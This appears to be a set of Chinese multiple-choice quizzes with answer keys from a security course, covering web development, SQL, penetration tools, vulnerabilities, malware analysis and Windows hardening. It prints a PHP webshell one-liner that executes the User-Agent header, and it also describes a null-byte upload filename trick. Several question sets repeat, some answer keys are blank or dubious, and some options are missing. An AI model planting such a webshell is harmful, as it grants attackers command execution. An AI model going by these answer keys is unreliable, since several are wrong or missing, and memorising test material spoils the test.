27、所有场景下使用re.compile预编译正则表达式都可以加快程序运行速度吗?

A、 对

B、 错

标准答案: B

28、视频中通过http响应中的响应实体来判断请求是否成功这个说法是否正确?

A、 对

B、 错

标准答案: A

29、视频中爬去漏洞id的代码是调用bs4进行筛选的这个说法对吗

A、 对

B、 错

标准答案: A

30、视频中是通过遍历页面获取每个漏洞的信息的吗?

A、 对

B、 错

标准答案: A

31、假设爬取poc的过程中响应的Content-Type为application/pdf那么我们可以说爬取成功了吗

A、 对

B、 错

标准答案: B

32、当爬取某一资源必须处在登陆状态时,带上cookie访问是否是一个长久的解决方案?

A、 对

B、 错

标准答案: B

33、Python库requests中requests.get(某url).headers输出的数据的数据类型是什么?

A、 元组

B、 字典

C、 字符串

D、 列表

标准答案: B

34、HTTP中的Keep-Alive是指持久连接吗

A、 对

B、 错

标准答案: A

35、编写Python程序请求网页的时候设置timeout主要是为了防止程序奔溃这个说法正确吗

A、 对

B、 错

标准答案: B

36、代理ip因为经常失效,所以需要维护一个代理ip池定期检查是否失效,这个说法是否正确?

A、 对

B、 错

标准答案: A

37、以下哪项是爬取代理ip中不需要的数据

A、 ip

B、 端口

C、 内存地址

D、 连接类型

标准答案: C

38、Python requests可以用来验证代理吗

A、 对

B、 错

标准答案: A

39、Zoomeye的api 当请求错误时会返回一个json格式的错误响应,下面哪个不是错误响应中json的字段?

A、 error

B、 message

C、 url

D、 userkey

标准答案: D

40、视频代码中使用json.load()的作用在于将字符串类型转化为 Python的字典类型这个说法正确吗?

A、 对

B、 错

标准答案: A

41、数据库管理系统DBMS的全称是什么?

A、 Database Management Software

B、 Database Management System

C、 Director Base Medical Services

D、 Data Being Manipulated Sequentially

标准答案: B

42、数据库(Database)是按照数据结构来组织、存储和管理数据的仓库,这句话对吗?

A、 对

B、 错

标准答案: A

43、关系数据库,是建立在关系模型基础上的数据库,借助于集合代数等数学概念和方法来处理数据库中的数据。这句话对吗?

A、 对

B、 错

标准答案: A

44、在下列关于关系型数据库系统的叙述中,正确的是

A、 表的字段之间和记录之间都不存在联系

B、 表的字段之间不存在联系,而记录之间存在联系

C、 表的字段之间和记录之间都存在联系

D、 表中只有字段之间存在联系

标准答案: C

45、revoke select on admin to bai这个SQL语句是干嘛的?

A、 数据查询DDL

B、 授权DCL

C、 删除记录DML

D、 回滚TCL

标准答案: B

46、SQL的全称是什么?

A、 Structured Question Language

B、 Strong Question Language

C、 Specified Quality Level

D、 Structured Query Language

标准答案: D

47、哪个 SQL 语句用于从数据库中提取数据?

A、 EXTRACT

B、 SELECT

C、 OPEN

D、 GET

标准答案: B

48、DDL(Data Definition Language)数据库操纵语言,用于定义数据库的三级结构,包括外模式、概念模式、内模式及其相互之间的映像,定义数据的完整性、安全控制等约束?

A、 对

B、 错

标准答案: B

49、哪条 SQL 语句用于更新数据库中的数据?

A、 UPDATE

B、 MODIFY

C、 SAVE

D、 SAVE AS

标准答案: A

50、哪条 SQL 语句用于删除数据库中的数据?

A、 COLLAPSE

B、 REMOVE

C、 DELETE

D、 del

标准答案: C

1、MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。这句话对吗?

A、 对

B、 错

标准答案: A

2、网站数据库经常会遭受哪种类型的攻击?

A、 跨站脚本

B、 跨站请求伪造

C、 SQL注入

D、 不安全的直接对象引用

标准答案: C

3、通过 SQL,您如何从 “ichunqiu” 表中选取 “username” 列的值以 “a” 开头的所有记录?

A、 SELECT * FROM ichunqiu WHERE username LIKE ‘a%’

B、 SELECT * FROM ichunqiu WHERE username=‘a’

C、 SELECT * FROM ichunqiu WHERE username LIKE ‘%a’

D、 SELECT * FROM ichunqiu WHERE username=’%a%’

标准答案: A

4、哪个 SQL 关键词用于对结果集进行排序?

A、 ORDER

B、 ORDER BY

C、 SORT

D、 SORT BY

标准答案: B

5、关于HTML5说法正确的是?

A、 HTML5只是对HTML4的一个简单升级

B、 所有主流浏览器都支持HTML5

C、 HTML5新增了离线缓存机制

D、 HTML5主要是针对移动端进行了优化

标准答案: C

6、下列哪一项是CSS正确的语法构成?

A、 body:color=black

B、 {body;color:black}

C、 body {color: black;}

D、 {body:color=black(body}

标准答案: C

7、我们可以在下列哪个 HTML 元素中放置 Javascript 代码?

A、

B、

C、

D、

标准答案: B

8、JavaScript是弱类型语言,不需要用户对变量类型进行明确的定义,这句话对吗?

A、 对

B、 错

标准答案: A

9、定义 JavaScript 数组的正确方法是

A、 var txt = new Array(“George”,“John”,“Thomas”)

B、 var txt = new Array=“George”,“John”,“Thomas”

C、 var txt = new Array:1=(“George”)2=(“John”)3=(“Thomas”)

D、 var txt = new Array(1:“George”,2:“John”,3:“Thomas”)

标准答案: A

10、ActionScript中所有数据都是对象这句话对吗?

A、 对

B、 错

标准答案: A

11、以下函数中,取得给定日期的月份的是什么

A、 day()

B、 month()

C、 year()

D、 weekday()

标准答案: B

12、下面哪种语言不被浏览器执行

A、 ASP

B、 HTML

C、 VBScript

D、 Javascript

标准答案: A

13、ASP.NET中,对于已经生成好的Web Service,在部署和实现该XML Web Service的时候,至少需要的文件有

A、 .asmx文件和.dll文件

B、 .dll文件和.disco文件

C、 AssemblyInfo.cs文件和Web.config文件

D、 AssemblyInfo.cs文件和.asmx文件

标准答案: A

14、ASP.NET中启动页级别的跟踪,可以在@Page指令中设置()参数来实现。

A、 race和TraceRange

B、 Trace和TraceMode

C、 Try和Catch

D、 Try和Finally

标准答案: B

15、ASP.NET程序中,以下()最有利于黑客在Web服务器上对站点文件进行破坏。

A、 Applicaion对象的Lock方法

B、 Server对象的MapPath方法

C、 客户端的JavaScript脚本

D、 页面内的_ViewState控件

标准答案: C

16、下面不属于PHP的标签是

A、 < >

B、 <? ?>

C、 <?= ?>

D、 <?php ?>

标准答案: A

17、以下关于PHP的描述不正确的是

A、 PHP是一种弱类型、解释型语言

B、 PHP与C、JAVA等面向对象一样,需要明确指定变量类型

C、 PHP可以与MySQL进行交互,创建动态Web站点

D、 PHP是PHP:Hypertext Preprocessor的递归缩写

标准答案: B

18、下面哪个是JSP中最基本的对象,它是用户与服务器进行交互的基础。

A、 Response对象

B、 Application对象

C、 Request对象

D、 Session对象

标准答案: C

19、在JSP程序中只有3种编译指令,分别是加载指令、标记数据库指令和什么指令

A、 描述指令

B、 网页指令

C、 取代指令

D、 释放指令

标准答案: B

20、Page指令中的“contenType”属性是用于指出什么类型

A、 服务器类型

B、 用户类型

C、 数据库类型

D、 网页类型

标准答案: D

21、在请求头中Connection表示什么

A、 表示客户端与服务连接类型

B、 表示浏览器有能力解码的编码类型

C、 表示浏览器支持的 MIME 类型

D、 表示客户端与服务连接类型

标准答案: D

22、burpsuite不可以抓到HTTPS的内容这句话对吗

A、 对

B、 错

标准答案: B

23、使用burpsuite爆破时在哪里设置Payload type为Numbers?

A、 Repeater下的payloads

B、 Intruder下的Payloads

C、 Proxy下的payloads

D、 Intruder下Target

标准答案: B

24、Webshell的功能不能实现读取注册表,这句话对吗?

A、 对

B、 错

标准答案: B

25、<?php system($_SERVER[‘HTTP_USER_AGENT’])?>这句webshell通过下面什么方式来执行的呢?

A、 参数HTTP_USER_AGENT

B、 HTTP请求头HTTP_USER_AGENT

C、 参数$_SERVER[‘HTTP_USER_AGENT’]

D、 参数system

标准答案: B

26、在php中使用全等于来判断大写的PHP和小写的php是否相等,以下说法正确的是?

A、 不相等

B、 相等

C、 不能用全等于来判断

D、 以上说法都不正确

标准答案: A

27、Nginx <8.03 空字节代码执行漏洞我们通过访问下面什么文件名来执行?

A、 xxx.asp;.jpg

B、 /xxx.asp/xxx.jpg

C、 /xxx.cer

D、 xxx.jpg%00.php

标准答案: D

28、在IIS7.0/IIS 7.5/Nginx < 0.8.3畸形解析漏洞中,默认Fast-CGI是不开启的,这句话正确吗?

A、 对

B、 错

标准答案: B

29、在iconv转码的过程中,utf转为gb2312会出现什么问题?

A、 字符串变成ASCII码了

B、 字符串为空了

C、 字符串变乱码了

D、 字符串被截断

标准答案: D

30、AngularJS是什么?

A、 Web应用

B、 Web前端框架

C、 Web服务端语言

D、 数据库

标准答案: B

31、Node.js能通过JavaScript语言开发web服务端吗?

A、 对

B、 错

标准答案: A

32、刷新和转到谁会更新本地的缓存?

A、 刷新

B、 转到

C、 刷新和转到都会更新

D、 刷新和转到都不会更新

标准答案: A

33、WWW的全称是什么?

A、 Wiki Wiki Web

B、 World Wide Web

C、 World Weather Watch

D、 Whole Wide World

标准答案: B

34、Bootstrap是哪个公司推出的前端开发开源工具包?

A、 Google

B、 Facebook

C、 Twitter

D、 Microsoft

标准答案: C

35、CMS是Content Management System的缩写?

A、 对

B、 错

标准答案: A

36、Django是什么语言编写的Web框架?

A、 PHP

B、 JavaScript

C、 Python

D、 Java

标准答案: C

37、下面关于ASP的表述中正确的是?

A、 ASP只能用写字板打开编辑

B、 ASP是一套客户端脚本运行环境

C、 ASP程序可以包含纯文字、HTML标记以及脚本语言

D、 ASP是一种跨平台的服务器的嵌入式脚本语言

标准答案: C

38、IIS的全称是什么?

A、 Internet Information System

B、 Industry Information Security

C、 Immunization Information Systems

D、 Internet Information Services

标准答案: D

39、数据库的特点之一是数据共享,严格地讲,这里的数据共享指的是什么?

A、 同一应用中的多个程序共享一个数据集合

B、 多个用户共享一个数据文件

C、 多个用户、同一种语言共享数据

D、 多种应用、多种语言、多个用户相互覆盖地使用数据集合

标准答案: D

40、Cookie在本地会有存储,这句话对吗?

A、 对

B、 错

标准答案: A

41、Windows是美国哪个公司研发的一套操作系统?

A、 Yahoo!

B、 Google

C、 iTunes

D、 Microsoft

标准答案: D

42、Google Chrome浏览器不可以在Linux操作系统下使用,这句话对吗?

A、 对

B、 错

标准答案: B

43、HTTP协议对事物处理有记忆能力,这句话对吗?

A、 对

B、 错

标准答案: B

44、TCP/IP是哪个层的协议

A、 表示层

B、 会话层

C、 应用层

D、 传输层

标准答案: C

45、以下哪些层是属于TCP/IP参考模型

A、 应用层

B、 传输层

C、 互联网层

D、 网络访问层

标准答案:

46、服务器错误服务不可用返回的数字是什么

A、 200

B、 403

C、 503

D、 502

标准答案: C

47、下面那个是不属于HTTP报头

A、 普通报头

B、 正文报头

C、 请求报头

D、 响应报头

标准答案: B

48、返回的状态码是200代表着什么

A、 客户端请求有语法错误,不能被服务器所理解

B、 服务器收到请求,但是拒绝提供服务。

C、 服务器发生不可预期的错误。

D、 客户端请求成功

标准答案: D

49、HTTP POST DOS拒绝服务攻击原理是在发送HTTP POST包时,指定一个非常大的Content-Length值,然后以很低的速度发包,比如10~100s发一个字节,保持住这个连接不断开。这样当客户端连接数多了以后,占用住了Web Server的所有可用连接,从而导致DOS。

A、 对

B、 错

标准答案: A

50、SQLI-LABS是一个什么漏洞练习平台

A、 SQL Injection

B、 XSS

C、 CSRF

D、 命令执行

标准答案: A

1、burpsuite不可以抓到HTTPS的内容这句话对吗

A、 对

B、 错

标准答案: B

2、使用burpsuite爆破时在哪里设置Payload type为Numbers?

A、 Repeater下的payloads

B、 Intruder下的Payloads

C、 Proxy下的payloads

D、 Intruder下Target

标准答案: B

3、Webshell的功能不能实现读取注册表,这句话对吗?

A、 对

B、 错

标准答案: B

4、<?php system($_SERVER[‘HTTP_USER_AGENT’])?>这句webshell通过下面什么方式来执行的呢?

A、 参数HTTP_USER_AGENT

B、 HTTP请求头HTTP_USER_AGENT

C、 参数$_SERVER[‘HTTP_USER_AGENT’]

D、 参数system

标准答案: B

5、在php中使用全等于来判断大写的PHP和小写的php是否相等,以下说法正确的是?

A、 不相等

B、 相等

C、 不能用全等于来判断

D、 以上说法都不正确

标准答案: A

6、Nginx <8.03 空字节代码执行漏洞我们通过访问下面什么文件名来执行?

A、 xxx.asp;.jpg

B、 /xxx.asp/xxx.jpg

C、 /xxx.cer

D、 xxx.jpg%00.php

标准答案: D

7、在IIS7.0/IIS 7.5/Nginx < 0.8.3畸形解析漏洞中,默认Fast-CGI是不开启的,这句话正确吗?

A、 对

B、 错

标准答案: B

8、在iconv转码的过程中,utf转为gb2312会出现什么问题?

A、 字符串变成ASCII码了

B、 字符串为空了

C、 字符串变乱码了

D、 字符串被截断

标准答案: D

9、AngularJS是什么?

A、 Web应用

B、 Web前端框架

C、 Web服务端语言

D、 数据库

标准答案: B

10、Node.js能通过JavaScript语言开发web服务端吗?

A、 对

B、 错

标准答案: A

11、刷新和转到谁会更新本地的缓存?

A、 刷新

B、 转到

C、 刷新和转到都会更新

D、 刷新和转到都不会更新

标准答案: A

12、WWW的全称是什么?

A、 Wiki Wiki Web

B、 World Wide Web

C、 World Weather Watch

D、 Whole Wide World

标准答案: B

13、Bootstrap是哪个公司推出的前端开发开源工具包?

A、 Google

B、 Facebook

C、 Twitter

D、 Microsoft

标准答案: C

14、CMS是Content Management System的缩写?

A、 对

B、 错

标准答案: A

15、Django是什么语言编写的Web框架?

A、 PHP

B、 JavaScript

C、 Python

D、 Java

标准答案: C

16、下面关于ASP的表述中正确的是?

A、 ASP只能用写字板打开编辑

B、 ASP是一套客户端脚本运行环境

C、 ASP程序可以包含纯文字、HTML标记以及脚本语言

D、 ASP是一种跨平台的服务器的嵌入式脚本语言

标准答案: C

17、IIS的全称是什么?

A、 Internet Information System

B、 Industry Information Security

C、 Immunization Information Systems

D、 Internet Information Services

标准答案: D

18、数据库的特点之一是数据共享,严格地讲,这里的数据共享指的是什么?

A、 同一应用中的多个程序共享一个数据集合

B、 多个用户共享一个数据文件

C、 多个用户、同一种语言共享数据

D、 多种应用、多种语言、多个用户相互覆盖地使用数据集合

标准答案: D

19、Cookie在本地会有存储,这句话对吗?

A、 对

B、 错

标准答案: A

20、Windows是美国哪个公司研发的一套操作系统?

A、 Yahoo!

B、 Google

C、 iTunes

D、 Microsoft

标准答案: D

21、Google Chrome浏览器不可以在Linux操作系统下使用,这句话对吗?

A、 对

B、 错

标准答案: B

22、HTTP协议对事物处理有记忆能力,这句话对吗?

A、 对

B、 错

标准答案: B

23、TCP/IP是哪个层的协议

A、 表示层

B、 会话层

C、 应用层

D、 传输层

标准答案: C

24、以下哪些层是属于TCP/IP参考模型

A、 应用层

B、 传输层

C、 互联网层

D、 网络访问层

标准答案:

25、服务器错误服务不可用返回的数字是什么

A、 200

B、 403

C、 503

D、 502

标准答案: C

26、下面那个是不属于HTTP报头

A、 普通报头

B、 正文报头

C、 请求报头

D、 响应报头

标准答案: B

27、返回的状态码是200代表着什么

A、 客户端请求有语法错误,不能被服务器所理解

B、 服务器收到请求,但是拒绝提供服务。

C、 服务器发生不可预期的错误。

D、 客户端请求成功

标准答案: D

28、HTTP POST DOS拒绝服务攻击原理是在发送HTTP POST包时,指定一个非常大的Content-Length值,然后以很低的速度发包,比如10~100s发一个字节,保持住这个连接不断开。这样当客户端连接数多了以后,占用住了Web Server的所有可用连接,从而导致DOS。

A、 对

B、 错

标准答案: A

29、SQLI-LABS是一个什么漏洞练习平台

A、 SQL Injection

B、 XSS

C、 CSRF

D、 命令执行

标准答案: A

30、Linux中提供了很多的网卡配置工具,下面哪个不属于Linux中配置网络的命令?

A、 netconfig

B、 prtconf

C、 ifconfig

D、 linuxconfig

标准答案: B

31、下面哪个参数可以让nmap不检测主机存活

A、 -sL

B、 -sn

C、 -Pn

D、 -PS

标准答案: C

32、在Metasploit中,我们使用什么命令加载第三方模块,如Nmap

A、 exploit_nmap

B、 show_nmap

C、 db_nmap

D、 run_nmap

标准答案: C

33、parallels desktop是哪个平台下的虚拟机软件

A、 Windows

B、 Android

C、 Mac OS

D、 Linux

标准答案: C

34、Kali Linux 前身是什么?

A、 NodeZero

B、 BackTrack

C、 Matriux

D、 Anonymous-OS

标准答案: B

35、在使用Python的Socket模块编程的时候,使用下面哪个方法来绑定本地地址

A、 accept

B、 send

C、 bind

D、 listen

标准答案: C

36、在使用Python的Socket模块编程的时候,使用下面哪个方法来发送消息

A、 accept

B、 send

C、 recv

D、 listen

标准答案: B

37、视频中实现的程序无法切换目录,在Python的OS模块中什么函数可以改变当前路径到指定路径

A、 os.remove()

B、 os.chdir()

C、 os.listdir()

D、 os.mkdir()

标准答案: B

38、Python中可以使用什么库来实现多线程

A、 OS

B、 Threading

C、 Time

D、 Socket

标准答案: B

39、在Python中,我们实例化一个Thread对象后,通过什么方法来运行

A、 start()

B、 enumerate()

C、 Thread()

D、 setDaemon()

标准答案: A

40、Python中我们使用try-except语句是为了保证用户是按软件使用要求传入三个参数,这句话对吗

A、 对

B、 错

标准答案: A

41、Python中SocketServer库中handle()函数有什么用?

A、 准备请求处理. 默认什么都不做

B、 处理请求,解析传入的请求,处理数据,并发送响应。默认什么都不做

C、 环境清理。默认什么都不做

D、 通过服务器的构造函数来激活服务器。默认的行为只是监听服务器套接字。可重载。

标准答案: B

42、以下有关代理服务器说法中不正确的是()

A、 为工作站提供访问Internet的代理服务

B、 代理服务器可用作防火墙

C、 使用代理服务器可提高Internet的浏览速度

D、 代理服务器是一种硬件技术,是建立在浏览器与Web服务器之间的服务器

标准答案: D

43、IMAP协议的端口号是多少

A、 80

B、 21

C、 143

D、 25

标准答案: C

44、使用Python编写抓包工具时,利用Python模块scapy中什么方法开始抓包?

A、 arp

B、 ether

C、 sniff

D、 sendp

标准答案: C

45、以下关于ARP欺骗的描述错误的是

A、 ARP欺骗可冒充网关欺骗主机

B、 ARP欺骗可冒充主机欺骗网关

C、 ARP欺骗可冒充主机欺骗其它主机

D、 在主机上静态绑定网关的MAC地址可防止所有ARP欺骗

标准答案: D

46、关于ARP表,以下描述中正确的是

A、 用于建立IP地址到MAC地址的映射

B、 提供常用目标地址的快捷方式来减少网络流量

C、 用于进行应用层信息的转换

D、 用于在各个子网之间进行路由选择

标准答案: A

47、下列关于ARP协议正确的是

A、 全称地址解析协议,通过ARP可以将IP地址解析为MAC地址。

B、 可以实现MAC地址到IP地址的转换。

C、 ARP病毒主要是利用IP地址可以随意更改来实现的。

D、 以上都正确

标准答案: A

48、HTTPS 本质与 HTTP 一样,都属于应用层协议,但 HTTPS 通过安全传输机制——安全套阶层(Secure Socket Layer,SSL)来传送数据。这种说法正确吗()

A、 对

B、 错

标准答案: A

49、在wireshark所抓数据包分析里,SYN响应包是ACK

A、 对

B、 错

标准答案: B

50、可以通过statistics的conversations查看会话及连接的统计详情,这种说法对吗

A、 对

B、 错

标准答案: A

1、下列对于ESP与EBP寄存器的描述错误的是?

A、 EBP在栈空的时候指向的是栈底,ESP指向的是栈底的下一个位置

B、 当参数入栈时,ESP指向的栈地址会向上移动

C、 当有参数入栈时,EBP指向的栈地址会向下移动

D、 EBP标识了当前栈帧的底部,ESP标识了当前栈帧的顶部

标准答案: C

2、下列对于栈溢出漏洞原理的描述错误的是哪条?

A、 可以造成命令执行漏洞

B、 栈溢出漏洞是缓冲区溢出漏洞的一种

C、 由于软件开发人员没有考虑周全造成的漏洞

D、 操作系统的内存管理机制的漏洞

标准答案: D

3、下列对软件壳保护技术描述错误的是?

A、 利用特殊的算法,对EXE、DLL文件里的资源进行压缩、加密

B、 附加在源程序之上,被加载执行的

C、 一般情况下,壳程序在源程序执行之前执行

D、 程序加壳保护,就不会存在源码泄露的风险

标准答案: D

4、下列对虚拟机保护壳描述错误的是?

A、 需要将代码翻译为机器和人都无法识别的一串伪代码字节流

B、 虚拟机就是将无法识别的伪代码字节流翻译为原始代码的一段程序

C、 就是程序在执行时创建一个虚拟机来执行程序,与主机隔离,防止源码外泄

D、 程序在执行时,先执行虚拟机程序将无法识别的伪代码逐步翻译

标准答案: C

5、下列关于缓冲区溢出的描述错误的是?

A、 计算机向缓冲区内填充数据位数超过了缓冲区本身的容量

B、 利用缓冲区溢出攻击,可以导致程序运行失败、系统关机、重启等

C、 缓冲区溢出是操作系统的内存管理机制的缺陷

D、 缓冲区溢出中,最为危险的是堆栈溢出

标准答案: C

6、在创建新的栈帧时EBP与ESP分别执行____操作。

A、 add esp,n;pop ebp;ret;

B、 push ebp;move ebp,esp;sub esp,n;

C、 move ebp;push ebp;pop;

D、 push esp;move esp;ret;

标准答案: B

7、下列关于栈描述错误的是?

A、 用于线性存储数据的内存

B、 具有先进后出的特点

C、 只能在一端对数据进行插入和删除

D、 使用的是二级缓存

标准答案: D

8、常见病毒程序中Overlay的起点位于区段表中哪个位置?

A、 倒数第二个区块末尾

B、 第一个区块开头

C、 最后一个区块末尾

D、 第一个区块末尾

标准答案: C

9、下列哪种方式不是病毒一般进行静态分析所采用的方式?

A、 查找字符串

B、 侦壳操作

C、 行为监控

D、 PE分析

标准答案: C

10、下面关于UPX的描述错误的是____。

A、 是一款可执行文件压缩器

B、 upx -9 表示最强程度压缩命令

C、 upx压缩后的文件需要解压后才能执行

D、 upx -d 为解压命令

标准答案: C

11、下面关于VMProtect的描述错误的是____。

A、 VMProtect是一个解释执行引擎

B、 在function层面X86代码和VMProtect不是一一对应的

C、 其本质是一个堆栈机

D、 通过NOR和ADD来实现X86指令的等价运算

标准答案: B

12、下面关于UPX的描述错误的是____。

A、 是一款可执行文件压缩器

B、 upx -9 表示最强程度压缩命令

C、 upx压缩后的文件需要解压后才能执行

D、 upx -d 为解压命令

标准答案: C

13、下面关于VMProtect的描述错误的是____。

A、 VMProtect是一个解释执行引擎

B、 在function层面X86代码和VMProtect不是一一对应的

C、 其本质是一个堆栈机

D、 通过NOR和ADD来实现X86指令的等价运算

标准答案: B

14、下列不属于脚本病毒的特点是:

A、 隐蔽性强

B、 传播性强

C、 爆发性

D、 自我消失性

标准答案: D

15、下列软件中不属于木马文件的是:

A、 PCshare

B、 njRAT

C、 KilerRat

D、 PCHunter

标准答案: D

16、直接通过文件后缀名判断该文件是否具有危害性:

A、 对

B、 错

标准答案: B

17、能够隐藏任务栏图标的软件是:

A、 HideTools

B、 PCHunter

C、 火绒剑

D、 冰刃

标准答案: A

18、下列哪个键值是修改文件关联方式的关键值:

A、 HKEY_CLASS_ROOT\txtfile\shell\open\command

B、 HKEY_CURRENT_USER\txtfile\shell\open\command

C、 HKEY_CLASS_ROOT\txtfile\shell\class\command

D、 HKEY_CURRENT_USER\txtfile\shell\class\command

标准答案: A

19、下列不属于本地安全策略中密码策略的是:

A、 密码必须符合复杂性要求

B、 密码长度最小值

C、 密码最长使用期限

D、 密码长度最大值

标准答案: D

20、开启密码必须符合复杂性要求策略后,下列哪个命令能够成功执行:

A、 net user test 123123 /add

B、 net user test 12312a /add

C、 net user test 123ads /add

D、 net user test 123!adss!! /add

标准答案: D

21、用户登录失败的记录可以通过事件管理器来查看

A、 对

B、 错

标准答案: A

22、用户不可以利用本地安全策略来实现:

A、 编辑计算机上的帐号策略和本地策略

B、 控制访问计算机的用户

C、 启用或禁用开始菜单内的功能选项

D、 修改计算机用户名密码

标准答案: D

23、配置组策略的主要目的是提高计算机安全性

A、 对

B、 错

标准答案: A

24、当计算器网络环境处在域环境中,应当配置哪个防火墙配置文件:

A、 专用配置文件

B、 域配置文件

C、 共用配置文件

D、 局域网配置文件

标准答案: B

25、如何配置远程桌面禁止访问:

A、 在入站规则处将远程桌面已启用选项关闭

B、 在出站规则处将远程桌面已启用选项打开

C、 在入站规则处将远程桌面已启用选项打开

D、 在出站规则处将远程桌面已启用选项关闭

标准答案: A

26、只允许本机访问其他机器的80端口,下面配置正确的是:

A、 在入站规则处新建规则,指定特定端口为80,协议为tcp的流量通行

B、 在出站规则处新建规则,指定特定端口为135,协议为tcp的流量通行

C、 在入站规则处新建规则,指定特定端口为135,协议为tcp的流量通行

D、 在出站规则处新建规则,指定特定端口为80,协议为tcp的流量通行

标准答案: D

27、禁用Windows firewall服务后,windows防火墙能够正常使用

A、 对

B、 错

标准答案: B

28、IPSec通过什么安全性来提供主动的保护以防止专用网络与Internet的攻击

A、 点对点

B、 端对端

C、 点对端

D、 端对点

标准答案: B

29、对于隧道模式说法正确的是:

A、 只对ip有效数据载荷进行封装和加密

B、 安全程度较低

C、 IP源和目标ip地址不加密传送

D、 从外部看不到数据包的路由过程

标准答案: D

30、下列选项中,不属于IPSec的优点是:

A、 除TCP/IP协议之外,不支持其他协议

B、 保护ip数据包的内容

C、 为IPV4和IPV6提供互操作能力

D、 保护ip数据包的内容

标准答案: A

31、新建一个IPSec策略,将源地址为任意地址的icmp协议包禁用,其他人使用ping命令探测本机,无法ping通

A、 对

B、 错

标准答案: A

32、下列属于系统克隆工具的是:

A、 TrueCrypt

B、 javaexec

C、 wce

D、 Ghost

标准答案: D

33、使用Ghost备份系统的步骤,Local->Partition->ToImage.开始备份系统

A、 对

B、 错

标准答案: A

34、对于栈是什么,下面说法正确的是():

A、 用于线性存储数据的内存,数据可以是函数的全局变量

B、 用于线性存储数据的内存,数据可以是函数的全局变量

C、 具有先出后进的特点

D、 与栈有关的操作:push入栈,pop出栈,mov数据传递指令

标准答案: D

35、函数栈帧之间对比错误的是():

A、 ESP内存空间为当前函数的栈帧

B、 EBP标识了当前栈帧的底部

C、 ESP标识了当前栈帧的底部,EBP标识了后面栈帧的顶部

D、 ESP与EBP之间的内存空间为当前函数的栈帧

标准答案: C

36、每个函数都有自己的栈帧,每个函数都是利用自己的栈帧空间保存全局变量与函数的调用关系。()

A、 对

B、 错

标准答案: B

37、如果能控制进程的执行流程,不能够执行想要执行的指令,达到我们目的的指令序列就叫做shellcode。()

A、 对

B、 错

标准答案: B

38、下面是漏洞代码,分析的结果:创建一个ba数组,将ba内容加密,修改ba内容,为ba解密。()

A、 对

B、 错

标准答案: B

39、Flash的JIT并没有检查CFG合法性?()

A、 对

B、 错

标准答案: A

40、漏洞分析有三大分类,正确一项是():

A、 利用位置,威胁类型,技术类型

B、 本地类型

C、 获取服务类型

D、 内存破坏类:动态数据区溢出

标准答案: A

41、构造数据通过程序不断的转播处理,改变了程序执行流程,造成数据被当作代码执行。()

A、 对

B、 错

标准答案: A

42、下面代码不存在溢出漏洞():

A、 对

B、 错

标准答案: B

43、当打开一个漏洞样本的时候,这个样本执行了test.tmp的exe,这个test.tmp还把IE执行起来了。在整个过程当中,那个API函数不可以运行可执行文件():

A、 ShellExecute

B、 Dumpbin

C、 CreateProcess

D、 WinExec

标准答案: B

44、一个PE文件装载进内存里,用OD调式器解释,可以看到有EIP指针,ESP当前函数栈帧,EBP函数栈帧,数据区(全局变量)。()

A、 对

B、 错

标准答案: A

45、堆栈溢出指的是堆溢出。()

A、 对

B、 错

标准答案: B

46、OLE对象包含内容的是():

A、 TXT纯文字文档

B、 PDF、Office、Flash格式文档

C、 EXE格式文档

D、 RAR格式文档

标准答案: B

47、OLE创建包含不同来源的复合文档和应用程序,不同类型的数据,但不能把文字、声音、表格、应用程序组合。()

A、 对

B、 错

标准答案: B

48、栈溢出后,如何利用漏洞?():

A、 少字节可编辑,EBP覆盖,文件格式系统嵌入,Shellcode后台执行,正常保存打开

B、 少字节可编辑,正常保存打开

C、 EBP覆盖,正常保存打开

D、 文件格式系统嵌入,正常保存打开

标准答案: A

49、如何做到栈溢出漏洞利用的技巧?():

A、 样本打开、触发漏洞、返回用户空间、显示正常页面

B、 样本打开、触发漏洞、搜索执行、恢复堆栈、返回用户空间、显示正常页面

C、 搜索执行、返回用户空间、显示正常页面

D、 触发漏洞、显示正常页面

标准答案: B

50、在Windows内置用户中,拥有最高权限的用户什么?( )

A、 Guest

B、 Adminitrator

C、 System

D、 User

标准答案: C

1、在Windows中将用户超级隐藏后,用户仍会在哪里有显示?( )

A、 命令提示符

B、 注册表

C、 用户组

D、 进程

标准答案: D

2、下列哪项不是Windows的常用文件系统?( )

A、 FAT32

B、 FILE

C、 NTFS

D、 EXT

标准答案: B

3、在NTFS文件系统中,子文件系统继承父文件系统权限后,如何修改子文件的权限?( )

A、 在子文件中修改

B、 在父文件中修改

C、 AB都可以

D、 上述都不对

标准答案: B

4、如果Windows中某文件采用EFS加密技术,未授权的其他管理员用户可以对文件进行什么操作?( )

A、 访问

B、 删除

C、 修改

D、 上述都不可以

标准答案: B

5、如何在未授权的情况下访问EFS加密的文件?( )

A、 输入管理员密码

B、 修改用户注册表

C、 导入证书

D、 修改为相同的用户名和密码

标准答案: C

6、在Windows中,为本地磁盘进行配额目的是什么?()

A、 平均分割磁盘

B、 避免部分用户占用磁盘过大

C、 清理垃圾文件

D、 提高磁盘利用率

标准答案: B

7、Windows中,在文件属性“共享”中,无法与之共享的用户是()

A、 Adminstrator

B、 Internet来宾用户

C、 Users

D、 Everyone

标准答案: C

8、Windows中,文件共享后,使用户对该文件权限和NTFS所设权限一样,方法有()

A、 开启共享向导

B、 启用脱机文件

C、 添加网上邻居向导

D、 更改共享对象

标准答案: A

9、Windows中,Service文件存储在什么地方()

A、 System32/config/service

B、 System32/config/system

C、 System/config/system

D、 System/config/service

标准答案: B

10、一个服务的启动类型为system,其在注册表中修改start的值是多少?( )

B、 1

C、 2

D、 3

标准答案: B

11、如何在DOS环境下查看系统当中的进程?

A、 tasklist

B、 taskkill

C、 del

D、 kill

标准答案: A

12、DOS下显示隐藏磁盘目录的命令是什么?

A、 attrib -s

B、 dir /ah

C、 type

D、 tree

标准答案: B

13、对病毒进行行为分析最常用的工具为?

A、 IDA Pro

B、 Process Monitor

C、 OllyDBG

D、 Process Explorer

标准答案: B

14、DOS下net share admin$ /del /y命令的作用是什么?

A、 添加系统根目录的共享

B、 查看共享

C、 取消系统根目录共享

D、 设置共享资源的用户

标准答案: C

15、Windows系统中的文件名查找函数是哪个?

A、 Process32First

B、 Module32First

C、 FindFirstFile

D、 Thread32First

标准答案: C

16、Windows系统终止指定进程及其所有线程的函数是什么?

A、 Process32First

B、 Module32First

C、 TerminateProcess

D、 Thread32First

标准答案: C

17、Windows系统字符连接函数是哪个?

A、 Process32First

B、 Module32First

C、 FindFirstFile

D、 lstrcat

标准答案: D

18、以下哪款工具可以实现查壳的工作?

A、 IDA Pro

B、 PEiD

